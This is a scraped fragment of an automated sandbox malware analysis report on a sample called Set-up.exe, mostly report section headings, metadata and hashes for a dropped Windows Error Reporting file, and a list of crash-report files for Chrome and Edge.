.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A25.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4707
Entropy (8bit):	4.456070175432447
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg771I90DrWOa8t2Ym8M4JGBRhFwyq85KcinqUCaOUkdd:uIjf6I7D2OldJGBuXfqUoUkdd
MD5:	D3C1D0C14B14C4F77B1720A95DC9D5E1
SHA1:	54D97FB63FBE1584AB95387FD8923F036336BA57
SHA-256:	DD9F2E2D74348E62355670C45C5DCC06A3DFAF22105C37A9911D58900DE9B4E3
SHA-512:	72ECAD29AB00C601312CD6685A2DD65A3115644D20636D6AF7CB95BF564C891CEDFBA5230588EC4A1EDB4FC04E84661E3FE738E12AC9081400FDC9AF9DB51963
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach&

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_09214adb-9fd0-44c0-a0e9-1d32bf30b89f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_839c2440-3000-4f8a-b3ac-c02cf614e8a6\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_9075c3c4-a6e6-45ed-ade9-137bd9ff37d2\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_3be725a7-7bec-402d-912c-5b6e1b4103ce\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_c2374def-a73f-4e01-95b4-340ccaa2b026\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_d5b0c01f-b54c-461f-bcf0-11216f7d913a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_6e7a37746f818a347830ea1e976120e73daecf72_75709460_5165434c-287c-474f-a884-9d1a74be8407\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_6e7a37746f818a347830ea1e976120e73daecf72_75709460_b01ff826-0a9d-4c99-9877-b3edef4f4d6f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_6e7a37746f818a347830ea1e976120e73daecf72_75709460_b102db5d-74bf-4bf9-9096-aa63fdbc572a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_b2183e612ae09e2d847ad213d2fdf44b96d97240_75709460_6cc951a1-00ca-4995-8233-9f6060a8e2f7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_b2183e612ae09e2d847ad213d2fdf44b96d97240_75709460_7e0abad9-a362-4765-a520-880ef44139fd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_b2183e612ae09e2d847ad213d2fdf44b96d97240_75709460_ce6506a8-9fc7-42cc-ba07-4b1639dcbce0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B32.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BA0.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BDF.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7071.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70B1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70E1.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7757.tmp.dmp

Windows Analysis Report
Set-up.exe